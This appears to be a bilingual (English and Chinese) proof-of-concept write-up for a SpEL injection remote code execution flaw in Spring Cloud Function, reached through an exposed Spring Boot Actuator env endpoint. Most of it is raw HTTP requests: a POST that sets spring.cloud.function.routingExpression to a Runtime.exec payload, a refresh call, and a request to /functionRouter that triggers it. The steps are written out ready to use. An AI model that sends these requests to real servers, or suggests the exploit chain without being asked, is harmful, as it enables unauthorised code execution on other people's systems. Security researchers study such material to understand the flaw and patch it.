Spring Cloud Function SPEL injection with the help of actuator.
It is clearly like as the Spring Cloud Gateway rce(CVE-2022-22947).As we can request env endpoint of Spring boot actuator just like this below:
The first step is to revalue the spring.cloud.function.routingExpression so that it produces an evil SPEL.
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: application/json
Content-Length: 109
{"name":"spring.cloud.function.routingExpression","value":"T(java.lang.Runtime).getRuntime().exec('calc')"}
The next step is to refresh the environment variables.
POST /actuator/refresh HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
POST /functionRouter/qqq HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
aaa
- Spring Coud Function 官方在最新版本3.2.3 已经修复了之前的commit为dc5128b 的SPEL注入漏洞。但笔者发现配置文件中的spring.cloud.function.routingExpression参数也存在SPEL注入点,因此理论上只要能够控制functionProperties.getRoutingExpression() 的值就能够触发这个漏洞。
- 当项目中引入了actuator 并且开启了env 端点,那么就可以实现RCE。
请求/env端点,写入配置:
请求/refresh端点,刷新配置生效:
最后通过请求/functionRouter 执行routingExpression
